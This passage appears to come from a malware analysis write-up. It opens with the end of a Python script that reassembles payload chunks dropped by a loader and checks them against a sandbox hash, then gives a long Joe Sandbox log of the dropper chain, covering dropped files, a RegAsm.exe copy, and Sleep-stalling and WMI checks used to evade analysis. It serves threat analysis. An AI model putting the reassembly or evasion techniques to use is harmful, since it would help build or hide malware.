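        print(f"{name}: {len(blob)} bytes  sha256={digest}  pe_header={looks_like_pe(blob)}")
```

Run as a script it prints size, SHA-256 and the PE-header check for each rebuilt file. With a real dump, replace PEPPER and CHUNKS with the bytes of the dropped Pepper, Lt, Blake, Tranny and Category files and compare the SHA-256 with the hash Joe Sandbox lists for 154571\Eco.pif; a mismatch usually means the line-ending quirk described in `findstr_v`, not a different payload.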
                    Source: C:\Users\user\Desktop\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exe | Section loaded: version.dll
                    Source: C:\Users\user\Desktop\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exe | Section loaded: netapi32.dll
                    Source: C:\Users\user\Desktop\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exe | Section loaded: netutils.dll
                    Source: C:\Users\user\Desktop\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exe | Section loaded: uxtheme.dll
                    Source: C:\Users\user\Desktop\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exe | Section loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp | Section loaded: mpr.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp | Section loaded: version.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp | Section loaded: netapi32.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp | Section loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp | Section loaded: netutils.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp | Section loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp | Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp | Section loaded: wtsapi32.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp | Section loaded: winsta.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp | Section loaded: textinputframework.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp | Section loaded: coreuicomponents.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp | Section loaded: coremessaging.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp | Section loaded: ntmarta.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp | Section loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp | Section loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp | Section loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp | Section loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp | Section loaded: wldp.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp | Section loaded: profapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp | Section loaded: shfolder.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp | Section loaded: rstrtmgr.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp | Section loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp | Section loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp | Section loaded: textshaping.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp | Section loaded: dwmapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp | Section loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp | Section loaded: sfc.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp | Section loaded: sfc_os.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp | Section loaded: explorerframe.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp | Section loaded: apphelp.dll
                    Source: C:\Program Files (x86)\StrLocalGate\Setup.exe | Section loaded: apphelp.dll
                    Source: C:\Program Files (x86)\StrLocalGate\Setup.exe | Section loaded: acgenral.dll
                    Source: C:\Program Files (x86)\StrLocalGate\Setup.exe | Section loaded: uxtheme.dll
                    Source: C:\Program Files (x86)\StrLocalGate\Setup.exe | Section loaded: winmm.dll
                    Source: C:\Program Files (x86)\StrLocalGate\Setup.exe | Section loaded: samcli.dll
                    Source: C:\Program Files (x86)\StrLocalGate\Setup.exe | Section loaded: msacm32.dll
                    Source: C:\Program Files (x86)\StrLocalGate\Setup.exe | Section loaded: version.dll
                    Source: C:\Program Files (x86)\StrLocalGate\Setup.exe | Section loaded: userenv.dll
                    Source: C:\Program Files (x86)\StrLocalGate\Setup.exe | Section loaded: dwmapi.dll
                    Source: C:\Program Files (x86)\StrLocalGate\Setup.exe | Section loaded: urlmon.dll
                    Source: C:\Program Files (x86)\StrLocalGate\Setup.exe | Section loaded: mpr.dll
                    Source: C:\Program Files (x86)\StrLocalGate\Setup.exe | Section loaded: sspicli.dll
                    Source: C:\Program Files (x86)\StrLocalGate\Setup.exe | Section loaded: winmmbase.dll
                    Source: C:\Program Files (x86)\StrLocalGate\Setup.exe | Section loaded: winmmbase.dll
                    Source: C:\Program Files (x86)\StrLocalGate\Setup.exe | Section loaded: iertutil.dll
                    Source: C:\Program Files (x86)\StrLocalGate\Setup.exe | Section loaded: srvcli.dll
                    Source: C:\Program Files (x86)\StrLocalGate\Setup.exe | Section loaded: netutils.dll
                    Source: C:\Program Files (x86)\StrLocalGate\Setup.exe | Section loaded: netapi32.dll
                    Source: C:\StrLocalGate\MmReveals.exe | Section loaded: apphelp.dll
                    Source: C:\StrLocalGate\MmReveals.exe | Section loaded: version.dll
                    Source: C:\StrLocalGate\MmReveals.exe | Section loaded: kernel.appcore.dll
                    Source: C:\StrLocalGate\MmReveals.exe | Section loaded: uxtheme.dll
                    Source: C:\StrLocalGate\MmReveals.exe | Section loaded: shfolder.dll
                    Source: C:\StrLocalGate\MmReveals.exe | Section loaded: windows.storage.dll
                    Source: C:\StrLocalGate\MmReveals.exe | Section loaded: wldp.dll
                    Source: C:\StrLocalGate\MmReveals.exe | Section loaded: propsys.dll
                    Source: C:\StrLocalGate\MmReveals.exe | Section loaded: profapi.dll
                    Source: C:\StrLocalGate\MmReveals.exe | Section loaded: edputil.dll
                    Source: C:\StrLocalGate\MmReveals.exe | Section loaded: urlmon.dll
                    Source: C:\StrLocalGate\MmReveals.exe | Section loaded: iertutil.dll
                    Source: C:\StrLocalGate\MmReveals.exe | Section loaded: srvcli.dll
                    Source: C:\StrLocalGate\MmReveals.exe | Section loaded: netutils.dll
                    Source: C:\StrLocalGate\MmReveals.exe | Section loaded: windows.staterepositoryps.dll
                    Source: C:\StrLocalGate\MmReveals.exe | Section loaded: sspicli.dll
                    Source: C:\StrLocalGate\MmReveals.exe | Section loaded: wintypes.dll
                    Source: C:\StrLocalGate\MmReveals.exe | Section loaded: appresolver.dll
                    Source: C:\StrLocalGate\MmReveals.exe | Section loaded: bcp47langs.dll
                    Source: C:\StrLocalGate\MmReveals.exe | Section loaded: slc.dll
                    Source: C:\StrLocalGate\MmReveals.exe | Section loaded: userenv.dll
                    Source: C:\StrLocalGate\MmReveals.exe | Section loaded: sppc.dll
                    Source: C:\StrLocalGate\MmReveals.exe | Section loaded: onecorecommonproxystub.dll
                    Source: C:\StrLocalGate\MmReveals.exe | Section loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-9OEDA.tmp\Setup.tmp | Section loaded: mpr.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-9OEDA.tmp\Setup.tmp | Section loaded: version.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-9OEDA.tmp\Setup.tmp | Section loaded: netapi32.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-9OEDA.tmp\Setup.tmp | Section loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-9OEDA.tmp\Setup.tmp | Section loaded: netutils.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-9OEDA.tmp\Setup.tmp | Section loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-9OEDA.tmp\Setup.tmp | Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-9OEDA.tmp\Setup.tmp | Section loaded: wtsapi32.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-9OEDA.tmp\Setup.tmp | Section loaded: winsta.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-9OEDA.tmp\Setup.tmp | Section loaded: textinputframework.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-9OEDA.tmp\Setup.tmp | Section loaded: coreuicomponents.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-9OEDA.tmp\Setup.tmp | Section loaded: coremessaging.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-9OEDA.tmp\Setup.tmp | Section loaded: ntmarta.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-9OEDA.tmp\Setup.tmp | Section loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-9OEDA.tmp\Setup.tmp | Section loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-9OEDA.tmp\Setup.tmp | Section loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-9OEDA.tmp\Setup.tmp | Section loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-9OEDA.tmp\Setup.tmp | Section loaded: wldp.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-9OEDA.tmp\Setup.tmp | Section loaded: profapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-9OEDA.tmp\Setup.tmp | Section loaded: shfolder.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-9OEDA.tmp\Setup.tmp | Section loaded: rstrtmgr.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-9OEDA.tmp\Setup.tmp | Section loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-9OEDA.tmp\Setup.tmp | Section loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-9OEDA.tmp\Setup.tmp | Section loaded: textshaping.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-9OEDA.tmp\Setup.tmp | Section loaded: dwmapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-9OEDA.tmp\Setup.tmp | Section loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-9OEDA.tmp\Setup.tmp | Section loaded: explorerframe.dll
                    Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: ntmarta.dll
                    Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cmdext.dll
                    Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: apphelp.dll
                    Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: version.dll
                    Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: mpr.dll
                    Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: framedynos.dll
                    Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: dbghelp.dll
                    Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: sspicli.dll
                    Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: srvcli.dll
                    Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: netutils.dll
                    Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: sspicli.dll
                    Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: wbemcomn.dll
                    Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: winsta.dll
                    Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: amsi.dll
                    Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: userenv.dll
                    Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: profapi.dll
                    Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: version.dll
                    Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: mpr.dll
                    Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: framedynos.dll
                    Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: dbghelp.dll
                    Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: sspicli.dll
                    Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: srvcli.dll
                    Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: netutils.dll
                    Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: sspicli.dll
                    Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: wbemcomn.dll
                    Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: winsta.dll
                    Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: amsi.dll
                    Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: userenv.dll
                    Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: profapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif | Section loaded: wsock32.dll
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif | Section loaded: version.dll
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif | Section loaded: winmm.dll
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif | Section loaded: mpr.dll
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif | Section loaded: wininet.dll
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif | Section loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif | Section loaded: userenv.dll
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif | Section loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif | Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif | Section loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif | Section loaded: wldp.dll
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif | Section loaded: napinsp.dll
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif | Section loaded: pnrpnsp.dll
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif | Section loaded: wshbth.dll
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif | Section loaded: nlaapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif | Section loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif | Section loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif | Section loaded: winrnr.dll
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif | Section loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif | Section loaded: ntmarta.dll
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif | Section loaded: apphelp.dll
                    Source: C:\Windows\SysWOW64\timeout.exe | Section loaded: version.dll
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe | Section loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe | Section loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe | Section loaded: aclayers.dll
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe | Section loaded: mpr.dll
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe | Section loaded: sfc.dll
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe | Section loaded: sfc_os.dll
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe | Section loaded: version.dll
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe | Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe | Section loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe | Section loaded: wtsapi32.dll
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe | Section loaded: winsta.dll
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe | Section loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe | Section loaded: wldp.dll
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe | Section loaded: profapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe | Section loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe | Section loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe | Section loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe | Section loaded: dwrite.dll
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe | Section loaded: msvcp140_clr0400.dll
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe | Section loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe | Section loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe | Section loaded: secur32.dll
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe | Section loaded: wbemcomn.dll
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe | Section loaded: amsi.dll
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe | Section loaded: userenv.dll
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe | Section loaded: dpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe | Section loaded: rstrtmgr.dll
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe | Section loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe | Section loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe | Section loaded: windowscodecs.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
                    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp | Window found: window name: TMainForm
                    Source: C:\Users\user\AppData\Local\Temp\is-9OEDA.tmp\Setup.tmp | Automated click: Next
                    Source: C:\Users\user\AppData\Local\Temp\is-9OEDA.tmp\Setup.tmp | Automated click: Next
                    Source: C:\Users\user\AppData\Local\Temp\is-9OEDA.tmp\Setup.tmp | Automated click: OK
                    Source: Window Recorder | Window detected: More than 3 window changes detected
                    Source: be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exe | Static file information: File size 4303615 > 1048576
                    Source: be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                    Source: Binary string: RegAsm.pdb source: RegAsm.exe, 00000013.00000000.2257986725.0000000000042000.00000002.00000001.01000000.0000000D.sdmp, RegAsm.exe.14.dr
                    Source: Binary string: RegAsm.pdb4 source: RegAsm.exe, 00000013.00000000.2257986725.0000000000042000.00000002.00000001.01000000.0000000D.sdmp, RegAsm.exe.14.dr
                    Source: C:\StrLocalGate\MmReveals.exe | Code function: 3_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,3_2_004062FC
                    Source: be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exe | Static PE information: section name: .didata
                    Source: be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp.0.dr | Static PE information: section name: .didata
                    Source: is-RI2MT.tmp.1.dr | Static PE information: section name: .didata
                    Source: Setup.tmp.2.dr | Static PE information: section name: .didata
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif | Code function: 14_2_00538AA5 push ecx; ret 14_2_00538AB8
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe | Code function: 20_2_06423B5F push 18068B92h; ret 20_2_0642401D
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe | Code function: 20_2_064242C4 pushad ; ret 20_2_064242DD
                    Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe | Code function: 20_2_06424B01 pushfd ; retf 20_2_06424B02

                    Persistence and Installation Behavior

                    Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\AppData\Local\Temp\154571\Eco.pif
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif | File created: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe
                    Source: C:\Users\user\Desktop\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exe | File created: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp
                    Source: C:\Program Files (x86)\StrLocalGate\Setup.exe | File created: C:\Users\user\AppData\Local\Temp\is-9OEDA.tmp\Setup.tmp
                    Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\AppData\Local\Temp\154571\Eco.pif
                    Source: C:\Users\user\AppData\Local\Temp\is-9OEDA.tmp\Setup.tmp | File created: C:\Users\user\AppData\Local\Temp\is-M0QJK.tmp\_isetup\_setup64.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp | File created: C:\StrLocalGate\MmReveals.exe (copy)
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp | File created: C:\StrLocalGate\is-RISCU.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp | File created: C:\Users\user\AppData\Local\Temp\is-SR5HU.tmp\_isetup\_setup64.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp | File created: C:\Program Files (x86)\StrLocalGate\is-RI2MT.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp | File created: C:\Program Files (x86)\StrLocalGate\Setup.exe (copy)
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif | Code function: 14_2_0059577B IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,14_2_0059577B
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif | Code function: 14_2_00525EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,14_2_00525EDA
                    Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pifCode function: 14_2_005332E9 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,14_2_005332E9
Source: C:\Users\user\Desktop\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX (11 identical events)
Source: C:\Program Files (x86)\StrLocalGate\Setup.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\StrLocalGate\MmReveals.exe | Process information set: NOOPENFILEERRORBOX (12 identical events)
Source: C:\Users\user\AppData\Local\Temp\is-9OEDA.tmp\Setup.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX (10 identical events)
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe | Process information set: NOOPENFILEERRORBOX (2 identical events)
Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif | Process information set: NOOPENFILEERRORBOX (2 identical events)
Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif | Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe | Process information set: NOOPENFILEERRORBOX (78 identical events)

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif | Stalling execution: execution stalls by calling Sleep
Source: C:\StrLocalGate\MmReveals.exe | Stalling execution: execution stalls by calling Sleep
Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe | WMI queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe | WMI queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe | Memory allocated: D30000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe | Memory allocated: 2720000 memory reserve | memory write watch
